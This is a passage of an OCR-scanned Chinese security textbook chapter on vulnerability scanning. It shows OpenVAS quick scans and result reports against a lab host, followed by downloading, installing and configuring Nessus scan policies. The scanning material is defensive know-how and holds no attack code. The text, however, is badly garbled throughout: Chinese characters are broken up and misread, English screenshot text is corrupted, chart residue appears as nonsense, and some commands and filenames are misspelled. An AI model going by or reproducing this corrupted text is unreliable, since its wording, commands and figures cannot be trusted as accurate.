Privilege escalation 

Product detection 

RPC 

Red Hat Local Security Checks 
Remote fle access 

SMTP problems 

SNMP 

SSL and TLS 


Service detection 


Settings 

Slackware Local Security Checks 
Solaris Local Security Checks 
SUSE Local Security Checks 
Ubuntu Local Security Checks 
Useless services 

VMware Local Security Checks 
Web Servers 

Web application abuses 
Windows 

Windows : Microsoft Bulletins 


Total: 62 


5. 快速 扫 摘 


109 of 109 


91 of 91 


102 of 102 


85 of 85 


85 of 85 


85 of 85 


136 of 136 


193 of 193 


329 of 329 


50 of 50 


402 of 402 


8 of8 


154 of 154 


177 of 177 


如 下 图 所 示 。 


1895 of 1895 


40 of 40 


21 of21 


656 of 656 


20f15 


60 of 60 


2059 of 2059 


11 of 11 


1574 of 1574 


58 of 58 


52 of 52 


7of7 


63 of 63 


216 of 217 


如 下 图 所 示 。 


12 of 12 


534 of 534 


1 ofl 


1426 of 1426 


3119 of 3119 


14 of 14 


58 of 58 


400 of 400 


5654 of 5655 


181 of 181 


1967 of 1967 


48034 of 48050 


On 


<] KK] KK]) KK] KK]) 


KE EK KK EK KK Kl 0] K Kl Kl 


[TD] Kl Kl Kl Kl Kl Kl Kl K]) 


除了 目 定 义 扫 摘 外 ，OpenVAS 还 提供 
了 一 个 快速 扫描 设置 ， 输 入 一 个 主机 地 址 
便 可 以 开始 快速 扫描 。 进 行 快速 扫描 的 操 


作 步 又 如 下 : 
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在 创建 扫描 任务 界面 中 有 一 个 魔法 棒 图 标 国 ， 如 下 图 所 示 。 


[step 轿 单 击 魔法 棒 图 标 国 ， 便 可 以 进入 快速 扫描 设置 界面 。 在 IP 地 址 栏 中 输入 一 个 主机 地 
址 ， 如 下 图 所 示 。 


Task Wizard % 


‘Quick start: Immediately scan an IP address 
IP address or hostname: 


192.168.1 .103 


The default address Is elther your computer or your networx gateWway. 
As a short-cut | will do the following for you: 


1 Create a new Target 

2 Create a new Task 

3. Start thls scan task rlght away 

4 Switch the View to reload every 30 seconds so you can lean back and watch the scan progress 


In fact, you must not lean back. As soon as the scan piogess is beyond 1%, you can already jump into 
the Scan report via the link in the Reports Total column and review the results collected so far. 


When creating the Target and Task | will use the defaults zs configured in "My Settings" 


By clicking the New Task icon 回 you can create a new Task yourself. 


单 击 Start Scan 按钮 ， 便 可 以 开始 一 个 快速 扫描 。 此 时 在 扫描 任务 列表 中 便 会 有 一 个 
已 启动 的 扫描 计划 ， 如 下 图 所 示 。 


Severity 图 |Trend 


Immediate scan of IP 192.168.1.103 0 (1) 回国 加 西 总 四 


单 击 左 侧 name 中 的 名 小 9 可 以 打开 快速 扫描 中 给 出 的 配置 项 ， 如 下 图 所 示 。 


是 Immediate scan of IP 192.168.1.105 


Name: Immediate scan of IP 192.168.1.105 
Comment: 

Target: Target for immediate scan of IP 192.168.1.105 
Alerts: 

schedule: (Next due: over) 

Add to Assets: yes 


Apply Overrides: yes 
Min QoD: 70% 


Alterable Task: no 
Auto Delete Reports: Do not automatically delete reports 
Scanner: OpenVAS Default (Wype: OpenVAS Scanner) 


Scan Config: Full and fast 
Order for target hosts: N/A 
Network Source Interface: 
Maximum concurrently executed NVTs per host: 10 
Maximum concurrently scanned hosts: 30 
Status: 
Duration of last scan: 
Average scan duration: 


Reports: 1, Current: Oct 30 2018 (Finished: 0) 
Results: 10 

Notes: 0 

LDOverrides: 0 


12.4.5 ”结果 及 其 他 


通过 前 面 的 学 习 相 信 读 者 已 经 可 以 配置 并 开局 一 个 扫描 了 ， 下 面 介 绍 OpenVAS 中 扫 接 
结果 以 及 一 些 其 他 功能 。 
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1. 扫 摘 结果 


当 扫 描 进 行 到 一 定 程 度 ， 不 但 可 以 看 到 扫描 的 进度 状态 ， 还 可 以 查看 目前 已 经 扫描 出 
的 结果 。 查 看 扫描 结果 的 操作 步骤 如 下 : 
在 扫描 任务 列表 中 Status 项 ， 指 出 了 当前 扫描 的 进度 ， 如 下 图 所 示 。 


Cp 
Status Severity 图 |Trend 


Immediate scan of IP 192.168.1.105 


0 局 口 四 回回 局 曲 
YAPpply to page contents ™ 问 本 


单 击 Status 中 的 扫描 进度 ， 便 可 以 打开 Report: Results 界 面 ， 如 下 图 所 示 。 该 界面 会 
按照 漏洞 威胁 程度 进行 排列 。 


『 ) ID: C3771d60-0794-44f6-8366-cBde0e048d65| 
@ Modified 
二 Report: Results (10 of 100) nde 

1*+1* 1 -10of10 ~* | 
Vuinerabiity 如 | 思 |sewvert, 加 oop|tos |tocation Actions 
Check for rlogin Service 3 70% 192.168.1.105 513/tcp 四国 
UnreallRCd Authentication Spoofing Vulnerability 局 80% 192.168.1.105 66657/tcp 因 转 
Anonymous FTP Login Reporting 3 80% 192.168.1.105 21itcp 因 鸭 
Check if Mailserver answer to VRFY and EXPN requests I 99% 192.168.1.105 25itcp 轩 高 
5SLTL5: Deprecated 55Lv2 and 55Lv3 Protocol Detection 98% 192.168.1.105 5432/tcp 轩 蜀 
55L/TL5; Deprecaled 55Lv2 ard 55Lv3 Piolocol Detet lion I 98% 192.168.1.105 25ILcp 园 轩 
Es RSA Temporary Key Handling 'RSA EXPORT Downgrade lssue 口 EIT 30% 192.168.1.105 25itcp 因 转 
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure EL 30% 192.168.1.105 5432/tcp 因 畏 


Vulnerability (POODLE) 


SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure edium) | 

wulnerabilty (POODLE) 80% 192.168.1.105 25itcp 因 击 

SSH Weak MAC Algorithms Supported 国 因 加 25 (Low) 95% 192.168.1.105 22ftcp 国 国 

(Applied filter:autofp=0 apply overides=] notes=] overrides=1 result hosts only=1 first=] rows=]100 sort-reverse=severity levels=hml 1- 10 of 10 
10d=70) i 


MiIiNn a 


[st 图 单 去 Vulnerability 中 的 任意 一 项 ， 可 以 打开 该 漏洞 的 简要 信息 ， 如 下 图 所 示 。 其 中 包 
括 该 漏洞 的 一 个 简要 报告 、 存 在 的 人 位置、 威胁 程度 以 及 修复 建议 等 。 


Vulnerability Location Actions 
phpinfo() output Reporting 80% 192.168.1.105 80/tcp 号 高 
Summary 


Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file s 
often left back in the webserver directory. 
Vulnerability Detection Result 


The following files are calling the function phpinfo() which disclose poientially sensitive information: 


http://192.168.1.105/mutillidae/phpinfo.php 
http://192.168.1.105/phpinfo. php 


Impact 

Some of the information that can he gathered from this file inclides: 

The username of the user running the PHP process, if it is a sudo user, the IP address of the host, the web server version, the system version 
(Unix, Linux, Windows, ...), and the root directory of the Web server. 

Solution 

Solution type: Ws Workaround 

Delete the listed files or restrict access to them. 

Vulnerability Detection Method 

Details: phpinfo() output Reporting (OID: 1.3.6.1.4.1.25623.1.0.11229) 

Version used: $Revision: 11992 $ 


(多 提示 : 扫描 出 的 漏洞 并 不 完全 准确 ， 需 要 后 续 的 验证 ， 如 果 确 实 存在 可 以 使 用 漏洞 列 
表 左 侧 的 图 标 为 其 添加 注释 信息 。 这 个 可 以 通过 单 击 右 侧 左 边 的 Add Note 按 钮 进行 添加 。 
如 果 扫 描 出 的 漏洞 并 不 存在 ， 这 里 只 是 误 报 ， 再 或 者 漏洞 确实 存在 但 威胁 并 没有 那么 高 ， 
这 时 可 以 调整 漏洞 评分 ， 通 过 单 击 最 右 侧 的 Add Override 按 钮 ， 可 以 在 打开 的 New Override 
对 话 框 中 进行 调整 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


VewW Override 


NYT Name | 
Active (©) yes, always 
yes, forthe next | 30 days 
no 
Hosts Any re) 192.163.1.105 
Location Any re yeneralitcp 
Severity Any 【se) > 0.0 
New Severity (© | False Positive Oher: 
Task Any (e) Immediate%20scan%20ofpb20IP%20192.168.1.105 
Result (0) Any Dnlyth: selected one (人 aa6373-080f43a57-8015-d638ca60a699) 
Text 


扫描 结束 后 可 以 通过 左上 方 选择 不 同 
的 格式 导出 扫描 报告 ， 如 下 图 所 示 。 


本 Anonymous XML 了 加 生生 


外- 


@ Report: Results (52 of 373) 


step 图 这 里 包含 了 大 量 的 导出 格式 ， 单 击 导 
出 格式 右 侧 的 下 拉 按 钮 ， 可 以 在 弹出 的 下 
拉 列 表 中 进行 选择 。 这 里 以 导出 PDF 格 式 为 
例 ， 如 下 图 所 示 。 


LaTeX 


NBE 
PDF 
Topology SVG 
TXT 


step 图 选择 完 导 出 格式 后 ， 单 击 向 下 箭头 的 
图 标 可 以 导出 扫描 报告 ， 同 时 可 以 选择 直 
接 打 开 或 存放 到 某 一 位 置 ， 如 下 图 所 示 。 


2. 其 他 功能 


Opening report-c3771d60-0794-44f6-8866-c8de0e048d65.xml 合 
You have chosen to open: 


report-c3771d60-0794-44f6-8866-c8de0e048d65.xml 


whichis: XML 文档 (497 KB) 
from:; https://127.0.0.1:9392 


What should Firefox do with this file? 


DOpenwith | 文本 坊 辑 绒 (default) Y 


LIDothis automatically for files like this from now on. 


Cancel | OK | 


如 果 选 择 直 接 打 开 ， 可 以 直接 打开 
并 导出 扫描 报告 ， 如 下 图 所 示 。 可 以 看 到 
OpenVAS 会 按照 分 类 生成 PDF 格式 的 文档 。 
这 个 文档 的 可 读 性 还 是 很 高 的 ， 主 要 包括 漏洞 
的 分 析 、 修 复方 案 以 及 修复 补丁 的 地 址 等 。 


国 | + #7 


= Result Overview 对 
Host Authentications 3 

™ Results per Host 3 
3 

5 


™ 192.168.1.105 


High 80/tcp 

High 1099/tcp 10 
High 513/tcp 了 
High 5S1A/tcp 12 
High 8200/tcp 12 
High general/tcp 13 


High 21/tcp 14 
High 1524/tcp 1 
High 512/tcp I 


High 3306/tcp 16 
High 5432/tcp 17 
High 5900/tcp 18 
High 3632/tcp 18 
High 22/tcp 19 
Medium 80/tcp 
Medium 21/tcp 29 
Medium 6667/tcp 30 


= | 自 0 


除了 上 述 介 绍 的 功能 外 ，OpenVAS 还 提供 有 很 多 其 他 功能 ， 下 面 分 别 进行 介绍 。 
(1) 以 图 表 的 形式 查看 扫描 报告 功能 。OpenVAS 会 将 扫描 的 漏洞 以 图 表 的 形式 进行 
展现 ， 通 过 选择 Assets 菜单 下 的 Operating Systemas 菜单 项 可 以 以 图 表 形 式 查 看 扫描 报告 ， 


如 下 图 所 示 。 


[ 


OS ] . 
Operating Systems (6 of 6) 


v Operating Systems by Severity C.,.. 


国 High 


v Operating Systems by Vulnerabil,.， v Operating Systems by CVSS (Tota.,, 


cpe:/o:linux:kernel 
.…/o:canonical:ubuntu linux 
cpe:/o:microsoft:windows 
.Nonical:ubuntu linux:8.04 
./o:deblan:deblan linux 


"lO:Microsoft:windows xp 


6.0 
-下 
5.0 
4.5 
4.0 
3.0 
2.5 
2.0 
145 
1.0 
0.5 
0.0 


0246810 NAO 1 2345567 8 910 


224 


第 12 章 “无线 网 络 中 主机 漏洞 的 安全 防护 一人 


(2) 以 不 同 评分 参考 标准 展现 扫描 结果 。 在 OpenVAS 中 给 出 了 不 同 的 漏洞 评分 参考 
标准 ， 并 以 图 表 或 详细 列表 的 形式 进行 展现 。 该 功能 存放 在 SecInfo 菜单 列表 之 中 ， 如 下 
图 所 示 。 


Configuration 


CPEs 
OVAL Definitions 
CERT-Bund Advisories 


DFN-CERT Advisories 


(3) 以 NVTs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 NVTs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 NVTs 参考 的 漏洞 图 表 展 示 ， 以 及 漏洞 数量 。 


ee p — NVTs (48054 of 48054) 
-= NVis by Severity Class (Total: 480... - NVTs by creation time (Total: 480... ” NVTs by Family (Total: 48054) 
Eee 
辆 High 
国 Medium 5,000 50,000 
| Low 7.000 45,000 
Log 本 40.000 
35.000 
本 30,000 
4DD0 25,000 
3.000 20,000 
2 000 15,000 
10,000 
1,000 区 5,000 
1 0 
200B00BO01001201201R018 


(4) 以 CVEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CVEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CVEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


CH 
_ ©@ cvEs (114679 of 114679) 


-= CVEs by Severity Class (Total: 114... vv CVEs by creation time (Total: 114... v CVEs by CVSS (Total: 114679) 


国 High 


i 40.000 
国 Medium 20,000 YB | 
[Low 18.000 110,000 ， 
Log 16.000 100,000 30,000 
Fp 90.000 | 
B80,000 : 
12,000 70,000 20,000 
10,000 g0.000 
8,000 50'000 15,000 
6,000 40,000 10,000 
30,000 ee 
ee 20,000 - 出 
2.000 10.000 0 
0 0 NAO 123456748910 


199019952000200520102015 


(5) 以 CPEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CPEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CPEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


|CPE 
“0 CPEs (286689 of 286689) 


-= CPEs by Severity Class (Total: 286... v CPEs by creation time (Total: 286... - CPEs by CVSS (Total: 286689) 


| 2 | year Yr 
— 二 JI0.000 
45,000 300,000 
| | Low er 60.000 
Log 35.000 250,000 50.000 
N/A 30,000 Fz00000 40.000 


150,000 30.000 


15,000 ononm 人 
10.000 10.000 
50,000 
5,000 0 
0 0 NAO 12345674910 


199019952000200520102015 
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二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


(6) 以 OVAL 参考 标准 展示 漏洞 图 表 功 能 。 选 择 OVAL Definitions 菜单 命令 ， 在 打开 
的 下 图 所 不 的 罩 面 中 列 出 了 使 用 OVAL 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


人 3 OVAL Definitions (28175 of 28175) 


~ OVAL Definitions by Severity Clas... = OVAL Definitions by creation time... ~ OVAL Definitions by class (Total: 2... 


— [year m= 


| compliance 
国 inventory 

吧 miscellaneous 
| patch 
vulnerability 


(7) 以 CERT-Bund 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CERT-Bund Advisories 荣 单 
命令 ， 在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 CERT-Bund 参考 标准 展示 的 漏洞 图 表 ， 
对 CERT-Bund Advisories (9209 of 9209) 

v CERTBund Advisories by creation.,. 


二 


2 


v CERT-Bund Advisories by CVSS [To... 


| 
NIA0 12345678910 


2014 2015 2016 2017 2018 


(8) 以 DFN-CERT 参考 标准 展示 漏洞 图 表 功 能 。 选 择 DFN-CERT Advisories 菜单 命令 ， 
在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 DFN-CERT 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 
数量 。 


上 EF 


0 DFN-CERT Advisories (18721 of 18721) 


一 /year -—- 
图 High 4500 
大 Medium 

4,000 
| Low 
- 3,500 
N/A 

3,000 

2.500 

2,000 

1.500 

1,000 

500 加 
: -~- 国 


NAGL 2a3 45 ET 10 


2008 2010 2012 2014 2016 2018 


( 侈 提示 : 可 以 通过 每 个 界面 中 的 查询 ， 查 询 出 某 个 漏洞 在 该 评分 标准 中 的 信息 。 


i 人 12.5 ”使 用 Nessus 打 描 漏 润 


Nessus 是 目前 使 用 最 为 广泛 的 系统 漏洞 扫描 与 分 析 软 件 ， 该 工具 提供 了 完整 的 漏洞 扫 
描 服 务 ， 并 随时 更 新 漏洞 数据 库 。Nessus 不 同 于 传统 的 漏洞 扫描 软件 ， 可 同时 在 本 机 或 远 
端 进行 系统 的 漏洞 扫 拉 分析。 
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12.5.1 下 载 Nessus 软 件 
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在 使 用 Nessus 扫 描 系 统 漏 洞 之 前 ， 首 先 需 要 下 载 Nessus 软 件 ， 有 具体 操作 步骤 如 下 : 
在 浏览 器 的 地 址 栏 中 输入 网 址 https:Wwww.tenable.com/downloads， 在 下 载 页 面 中 找 


到 Nessus 软 件 ， 如 下 图 所 示 。 


Downloads 


Nessus 


Download Nessus and Nessus Manager. 


单 击 Nessus 会 跳 转 到 Nessus 软 件 下 载 界 面 ， 如 下 图 所 示 。 


Nessus 


Need an Activation Code? 


In order to complete your Nessus installation, you need an activation code if you dont have one already. 


Get Activation Code 


Binary download files for Nessus Professional, Nessus Manager, and connectine Nessus Scanners to Tenable.io & SecurityCenter. 


Nessus 家 用 版 是 免费 的 ， 但 是 也 需要 
注册 获取 注册 码 ， 单 击 Get Activation Code 
按钮 ， 跳 转 到 版 本 界面 ， 如 下 图 所 示 。 
Nessus Home 
Free 


Nessus® Home allows you to scan your personal home network with the 
same powerful scanner snjoyed by Nessus subscrlbers， 


For Home Users 


Scan 16 1ps 
Nessus Home features: 


High-speed, accurate assessment with thousands of checks 


Agentless scanning of home networks 


Register Now 


单 击 Register Now 按 钮 ， 跳 转 到 注册 
界面 ， 如 下 图 所 示 。 


Register for an Activation Code 


First Name * Last Name * 


Email * 


_|Checktoreceive updatesfrom Tenable 


step 图 在 注册 界面 中 ， 输 入 用 户 名 与 邮箱 
地 址 ， 单 击 Register 按 钮 ， 会 提示 注册 码 已 
发 送 至 你 的 邮箱 ， 然 后 会 出 现 一 个 下 载 按 
钮 ， 如 下 图 所 示 。 


Download Nessus 


To download Nessus, visit the Nessus 
Download page. 


登录 邮箱 会 发 现 Nessus 发 送 的 激活 
码 ， 如 下 图 所 示 。 


itenable 


Nessus Home Evaluation 


Welcome to Nessus Home and congratulations on taking action to secure 
your personal network! We offer the latest plugins for vulnerability scanning 
today, helping you identify more vulnerabilities and keep your personal 
network protected. 


If you use Nessus in a professional capacity and want advanced capabilities 
such as unlimited assessments, or the ability to perform compliance checks 
or content audits, Nessus Professional may be better suited to your needs. 
To learn more view the Nessus Professional datasheet or request a free 
evaluation. 


Activating Your Nessus Home Subscription 


Your activation code for Nessus Home is: 


pp | 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


输入 uname -a 命令 查看 kail 内 核 信 
息 ， 以 选择 需要 下 载 哪个 版 本 的 Nessus 软 
件 ， 如 下 图 所 示 。 


oot@kali:-~# Uname -a 
( 


inux kali 4.18.0-kali2-amd64 #1] SMP Debian 4.18.10-2kalil 
2018-106-069) x86 64 GNU/Linux 


根据 自己 的 系统 选择 相应 的 版 本 。 
这 里 选择 Debian 系 统 类 型 的 版 本 ， 如 下 图 
所 示 。 


Ob Nessus-8.0.0-debian6 i365.deb Debian 6,7,8,9 / Kali Linux 1,2017.3 i386(32-bit) Checksum 

DP Ne5ssu5-8.0.0.dmg macos (10.8 - 10.13) Checksum 

oD Ne5s5u5-8.00-es5.386.rpm Red Hat ES 5 1386(32-bit) { CentOS 5 / Oracle Linux 5 Checksum 
lincluding Unbreakable Enterprise Kernel) 

‘Nessus-8.0.0-amzn.x86 bhmpm Amazon Linux 2015.03, 2015.09, 2017.09 Checksum 

oD” Nessus-8,0.0-es6.x86_64.1pm Red Hat ES 6 (64-bit) { CentOS 6 / Oracdle Linux 6 Checksum 
[including Unbreakable Enterprise Kernel) 

各 Nessus-8,0,0- Debian 6, 7, 8,9 / Kali Linux 1, 2017.3 AMD64 Checksum 

debian6 amd64.deb 


选择 版 本 后 会 弹出 一 个 许可 协议 ， 单 
击 IAgree 按 钮 ， 如 下 图 所 示 。 


License Agreement 


andjor domaoees finally awarded ogninst You by ma col 
(by) If Your use of the Software is, or in Tenables opinion is likely to be, the subjezt of an infringement claim, or if required by 
settlement, Tenable may in its sole discretion and expense, (i) substitute for the Software substantially functionally similar non- 


rt of competent jurisdiction, 


infringing software; (1) procure for YOU the right to continue using the Software; oriii) terminate this Agreement, accept return of 
the Software and provide a pro rata refund to You The pro rata refund will be calkulated as follows; (1) for subscriptions, Tenable 
will provide a refund of any prepaid License Fees for the unused remainder of the license term; and (2) for perpetual licenses, 

23. Dispute Resolution 


All ep arising Out of or relating to this er EE be subject to arbitration within the meaning of the Arbitration ee 
2D010 © de islation amendin Se that oct and shall be nducted in Dublin, Ireland in the Cn 


step 图 浏览 器 会 弹出 一 个 打开 还 是 保存 文件 
的 信息 提示 ， 这 里 选择 保存 ， 单 击 OK 按 钮 
即 可 开始 下 载 并 保存 Nessus 软 件 ， 如 下 图 
所 示 。 


Opening Nessus-8.0.0-debian6_amd64.deb Be 


You have chosen to open: 
” Nessus-8.0.0-debian6_amd64.deb 
whichis: Debian 软件 包 (63.8 MB) 


from: https://tenable-downloads-production.s3.amazonaws.com 


What should Firefox do with this file? 


归档 管理 器 (default) v 


LOpen with 


|_ Dothis automatically for files like this from now on. 


Cancel OK 


12.5.2 ”安装 Nessus 软 件 


Nessus 软 件 下 载 完 成 后 ， 
了 。 有 具体 操作 步骤 如 下 : 
切换 到 Nessus 安 装 包 目 录 ， 使 用 
dpkg -i Nessus-8.0.0-debian6 amd64.deb 命 
令 ， 执 行 安装 ， 执 行 效果 如 右上 图 所 示 。 


束 需 要 安装 


228 


安装 完成 会 提示 用 于 登录 管理 界面 的 网 络 
地 址 。 


root@kali:~/Downloads# dpKg -i Nessus-8.0.6-debian6 amd64.deb 
正在 选中 未 选择 的 软件 包 nessus。 

(正在 读 取 数据 库 ... 系统 当前 共 安装 有 379781 个 文件 和 目录 。 ) 
准备 解压 Nessus-8.0.9-debian6 amd64.deb  ... 

正在 解压 nessus (8.0.0) ... 

正在 设置 nessus (8.0.0) ... 

Unpacking Nessus Scanner Core Components... 


- You can start Nessus Scanner by typing /etc/init.d/nessusd start 
- Then go to https://kali:8834/ to configure your scanner 


正在 处 理 用 于 systemd [239-19| 的 触发 器 ... 


使 用 /etc/init.d/nessusd start 命 令 ， 局 动 
ee 执行 效果 如 下 图 所 示 ， 说 明 Nessus 
已 经 局 动 。 


和 /etc/init.d/nessusd | 


tarting Nessus : . 


在 网 页 器 中 输入 https://kali: 
0 网 址 ， pee 页 管理 界面 。 首 
次 打开 会 提示 网 页 没有 安全 证 书 ， 如 下 图 
所 示 。 


The wwner of kali has configued their website improperly, To protect your information from being stolen, Firefox has 
nol connected Lo this websile. 


| eam more.. 


Report errors like this tohelp Mozilla identify and block malicious sites 


单 击 Advanced 按 钮 ， 进 入 如 下 图 所 示 
的 高 级 选项 页 面 。 


Mdvanced 


kali:8834 uses an invalid security certificate. 

The certificate is not trusted because the issuer certificate is unknown,. 

The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported, 


Error code: SEC_ERROR_UNKNOWN _ISSUER 


Add Exception:.. 


在 高 级 选项 
Exception 按 钮 ， 添 加 证 书 为 可 信 ， 
击 Confirm Sercurity Exception 按 钮 ， 
书 ， 如 下 图 所 示 。 


Add Security Exception @ 


页 面 中 ， 单 击 Add 
然后 单 
获取 证 


You are about to override how Firefox identifies this site, 
Legitimate banks, stores, and other public sites will not ask you to dothis. 


Server 
Location: https://kali-8834/ Get Certificate | 
Certificate Status 
This site attempts to identify itself with invalid information, View... | 
Unknown ldentity 


The certificate is not trusted because lt hasn't been verifled as issued bya trusted authority usinga secure signatura. 


[Permanentty store this exception 


Confirm Security Exception Cancel 


首次 登录 需要 先 注 册 一 个 
号 。 下 图 为 管理 员 注 册 界 面 。 


管理 员 账 
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激活 以 后 Nessus 会 初始 化 目前 的 漏洞 
检测 库 ， 如 下 图 所 示 。 


Nessus 候 


Create an account cm 
ap Nessus 人 外 


Initializing 


Username * 


N 


Password * 


和 


[step 国 在 管理 员 注 册 界 面 中 ， 输 入 完 用 户 命 = , 
与 密码 ， 单 走 Continue 按 钮 ， 跳 转 到 注册 激 ” [see 图 等 待 漏洞 检测 库 更 新 完成 后 ， 登 录 并 


活 界面 ， 输 入 邮箱 获取 的 激活 码 ， 如 下 图 进入 主 界面 ， 如 下 图 所 示 。 


所 示 Nessus 人 和 本 
My Scans Impor New Folder 
| mr My Scans 
Nessus@O jb Craate a new scan 
Trash 
Register your scanner 
Ent ee s below to rur | pa 
lv or choose one he dropdow tions | ee 

Scanner Type TU 

Home, Professional or Manager - 和 注意 : Nessus 与 OpenVAS 不 同 9 Openvas 

Activation Code * 在 进行 扫描 之 前 需要 一 个 配置 、 定义 一 个 
主机 、 创 建 一 个 任务 然后 才能 进行 扫描 ， 

而 Nessus 则 是 选择 不 同 的 策略 。 


在 首页 中 选择 左 侧 的 Policies 选 项 ， 进 入 策略 项 界面 ， 如 下 图 所 示 。 
Policies mo ET 


created, they can be selected from the list of scan templates. From this page you can view, create, 


CE Policies allow you to create custom templates defining what actions are performed during a scan. Once 
import, download, edit, and delete policies. 


Create a new policy 


首次 进入 是 没有 创建 策略 的 ， 这 里 需要 先 创建 一 个 策略 ， 单 击 New Policy 按 钮 ， 创 
建 一 个 新 的 策略 。 用 户 也 可 以 在 打开 的 下 图 所 示 界 面 中 选择 Nessus 给 出 的 策略 模板 。 


Policy lemplates 


《Back to Policies 


Scanner 
a 人 ~ FE 一 小 
Advanced Scan Audit Cloud Infrastructure Badlock Detection Bash Shellshock Detection Basic Network Scan 
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ee 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


站 提示 : Nessus 默 认 提 供 了 很 多 策略 模 
板 ， 和 选择 相应 的 模板 即 可 ， 当 然 它 是 一 
个 商业 版 漏洞 扫描 器 ， 因 此 有 一 些 模板 
是 收费 的 ， 凡 是 右上 角 注 有 upgrade 字 样 
的 都 需要 升级 到 专业 版 及 以 上 版 本 才 可 
以 使 用 。 


12.5.3 ”高 级 扫 摘 设置 

高 级 扫描 (Advanced Scan) 是 Nessus 
提供 的 一 个 针对 所 有 网 络 设备 的 基础 扫 
描 ， 其 他 类 型 的 扫 摘 都 是 基于 它 的 扩充 或 
者 修改 。 高 级 扫描 中 有 很 多 的 设置 项 ， 了 


解 每 一 项 的 作用 对 于 配置 适合 的 扫 摘 类 型 
有 多 大 帮助 。 

高 级 扫描 设置 的 操作 步骤 如 下 : 
在 Policy Templates 设 置 界 面 中 选择 
Advanced Scan 人选 项， 进入 Advanced Scan 设 
置 界 面 ， 如 下 图 所 示 。 


New Policy / Advanced Scan 


《 Back to Policy Templates 


Settings Credentials Compliance Plugins 


在 基础 (BASIC) 信息 设置 界面 中 ， 
可 以 输入 名 字 ， 以 及 一 些 描述 信息 ， 如 下 
图 所 示 。 


BASIC 
Nam 
General 
Permissions Rt 
Description 
DISCOVERY 
ASSESSMENT 


REPORT 


ADVANCED 


选择 DISCOVERY (权限 ) 选项 ， 该 选项 提供 有 3 个 子 选 项 ， 包 括 Host Discovery ( 主 
机 发 现 ) 、Port Scanning (端口 扫描 ) 、Service Discovery (服务 发 现 ) ， 如 下 图 所 示 。 


DISCOVERY 


Port Scanning 


ASSESSMENT 


REPORT 


ADVANCED 


Host Discovery 


Service Discovery 


选择 Host Discovery 选 项 ， 在 打开 的 界面 中 可 以 设置 Ping 远 程 主机 的 方法 ， 包 括 两 
项 ， 第 1 项 表示 本 机 在 测试 范围 之 内 ， 第 2 项 为 快速 网 络 发 现 。 如 果 远 程 主机 发 送 Ping 包 ， 
Nessue 为 了 避免 误 报 会 执行 其 他 操作 来 验证 ， 如 下 图 所 示 。 


BASIC 
Remote Host Ping 
DISCOVERY 

Ping the remote host a 
Host Discovery 


Port Scanning 
General Settings 
Service Discovery 


内 Testthe local Nessus host 


ASSESSMENT 
REPORT 


ADVANCED Use fast network discovery 


侈 提示 : Ping 包 的 模式 选择 ， 如 下 图 所 示 。 


这 里 可 以 选择 多 种 协议 类 型 ， 和 包括 ARP、 


TCP、ICMP 及 UDP 等 。 由 于 UDP 测 试 并 不 是 很 准确 ， 所 以 这 里 默认 并 没有 选择 ， 但 是 仍 
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Ping Wethods 


ww ARP 


w TP 


Destination ports built-in 


ww ICMP 


Assume ICMP unreachable from the gateway means the host is down 


Maximum number of retries 2 


UDP 


比较 脆弱 的 网 络 设备 有 3 个 选项 可 供 
选择 ， 包 括 是 否 有 共享 打印 、 扫 描 网 络 设 
备 、 扫 描 网 络 控制 设备 ， 如 下 图 所 示 。 


Fragile Devices 


Scan Network Printers 


Scan Novell Netware hosts 


Scan Operational Technology devices 
设置 局 域 网 唤醒 选项 ， 可 以 加 入 含有 
MAC 地 址 表 的 文件 ， 以 及 唤醒 等 待 时 间 ， 
这 里 以 分 钟 为 单位 ， 如 下 图 所 示 。 


Wake-on-LAN 
List of MAC addresses Add File 
Boot time wait (in minutes) 5 


选择 端口 扫描 ， 进 入 端口 过 滤 设 置 
界面 ， 如 果 选 中 Consider unscanned ports as 
closed 复 选 框 ， 则 扫描 的 端口 将 视 为 关闭 不 再 
进行 扫描 ， 这 里 建议 不 选中 ， 如 下 图 所 示 。 


BASIC 


Ports 
DISCOVERY Y 
Consider unscanned ports as closed 
Host Discovery 


Port scan range: ，default 


Port Scanning 


Service Discovery 

本 地 端口 集合 设置 界面 ， 这 里 优先 检 
查 SSH、WMI、SNMP 这 些 服 务 端 口 ， 只 有 
当 本 地 端口 枚 举 失 败 后 才 运 行 网 络 端口 扫描 
程序 。 最 后 一 项 默认 没有 勾 选 ， 它 用 于 验证 
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本 地 所 有 打开 的 TCP 端 口 ， 如 下 图 所 示 。 


Local Port Enumerators 


~ SSH (netstat) 


wv WMI (netstat) 


w SNMP 


w Ony run network port scanners if local port enumeration failedl 


Verify open TCP ports found by local port enumerators 


网 络 端口 扫描 使 用 默认 的 SYN 包 进 
行 检 测 ， 如 果 需 要 进行 防火 墙 过 滤 检 测 可 
以 选中 下 方 的 Override automatic firewall 
detection 选 项 ， 这 里 给 出 了 3 个 模式 : 默认 
简单 检测 (Use soft detection ) 、 主 动 检 
测 (Use aggressive detection) 、 禁 用 检测 
(Disable detection) ， 如 下 图 所 示 。 


Network Port Scanners 


v SYN 


Override automatic firewall detection 


® Use soft detectiol 


SSiVe detect 


